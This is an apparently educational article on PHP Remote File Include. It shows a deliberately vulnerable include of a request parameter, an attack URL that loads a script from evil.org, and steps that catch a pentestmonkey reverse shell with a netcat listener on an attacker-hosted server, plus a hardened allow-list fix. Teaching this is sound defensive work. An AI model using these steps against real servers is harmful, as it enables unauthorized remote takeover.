RCE: Through Includes

In this article we will look at getting Remote Code Execution (RCE) through File Include attacks. This is dangerous stuff: if an attacker can get a shell on the server, they can execute any commands they like.

Remote File Includes

A much more fun version of the local file includes attack, Remote File Includes (RFI) are where the PHP server has been configured to allow users to include items from another site.

This option has now been removed from the default PHP settings, but may still be turned on in older configurations. Additionally, given the popularity of PHP (much like WordPress), there are many conflicting (and possibly dangerous) tutorials out there explaining how to get this functionality enabled, so it is still worthwhile including.

With RFI we can include files from servers other than the origin. Evidently this makes it much easier for us to get scripts running remotely.

Let's look back at our example from the LFI exploit:

<form method="get" action="examples.php">
    <div class="form-group">
        <label for="product">Product</label>
        <select class="form-control" id="product" name="product">
            <option value="widget.php">Widget</option>
            <option value="gubbins.php">Gubbins</option>
            ....
        </select>
    </div>
    <div class="form-group">
        <button type="submit" class="btn btn-primary">Show Product</button>
    </div>
</form>


<?php
    // Deliberately vulnerable: the request parameter is used directly as the include path.
    if (!isset($_GET["product"])) {
        include "default.php";
    } else {
        include $_GET["product"];
    }
?>

Now this time, our server will accept includes from servers in the wider internet. What might happen if we modify the request to look like this...

http://evil.org/products?product=http://evil.org/test.php

The server tries to load the contents of test.php from the server at evil.org, then include it in the page that is displayed.

If it's not clear why displaying a page the attacker has full control of (and can execute scripts on) is a problem, you are not being paranoid enough.
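The fix is not to sanitise the path but to never use the request value as a path at all. Below is an added hardened version of the include above (example code, not from the original article): the parameter becomes a lookup key into a fixed allow-list, and the script refuses to run if allow_url_include is on. The file names and the 400/500 responses are assumptions.

```php
<?php
// Hardened replacement for `include $_GET["product"];` (added example, not the article's code).

// Allow-list of the only pages this script is ever meant to include.
// Values match the <option> values in the form above (assumed file names).
const PRODUCT_PAGES = ['widget.php', 'gubbins.php'];

/**
 * Map the untrusted request value to an allow-listed file.
 * Returns the file name, or null when the value is not on the list.
 * The user-supplied string is only ever compared, never used as a path.
 */
function resolveProductPage(?string $requested): ?string
{
    if ($requested === null) {
        return 'default.php';   // same behaviour as the original when the parameter is absent
    }
    // Strict comparison: "widget.php\0", "../widget.php" or a URL never match.
    return in_array($requested, PRODUCT_PAGES, true) ? $requested : null;
}

// Defence in depth: refuse to serve anything if remote includes are switched on
// (ini_get returns "1"/"On" style strings, which FILTER_VALIDATE_BOOLEAN understands).
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}

$page = resolveProductPage($_GET['product'] ?? null);
if ($page === null) {
    http_response_code(400);
    exit('Unknown product');
}

// $page is now one of our own constants, never attacker-controlled text,
// and is anchored to this script's directory so no other location is reachable.
include __DIR__ . '/' . $page;
```

Rejected requests (a URL, a traversal string, an unknown name) are worth logging server-side, as they are a cheap indicator that someone is probing the include parameter.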

Note

I have been trolled by trying to upload the php shell script from servers which have PHP enabled. This has ended up in me P0wning myself. Think for a bit about why this would happen. Have a laugh, then be thankful you haven't spent 10+ minutes trying to work out what the hell is happening.

Getting a shell through RFI

Let's move on to the fun stuff....

To take this attack from concept to exploit we need to:

  1. Grab a shell that we can execute from somewhere
     • Google: github pentestmonkey php reverse shell
  2. Read The Full Manual
     • We will need to change some parameters; look for the bit that says CHANGE THIS
     • Joking aside, it can be a BadThing(TM) to run any script without checking it first [1]
  3. Get a web server up and running to host the script: python -m SimpleHTTPServer
  4. Get something like a netcat listener ready to catch the shell: nc -nvlp 4444
  5. Point the includes parameter at our script: http://192.168.3.141/finc/examples.php?lang=http://192.168.3.1:8000
  6. ....
  7. Profit

Task

Work through the task using the Linux Trainer. It's much easier to see how things fit together if you are actually doing it.


[1] Goldsmith 2010-2020 Collected Rants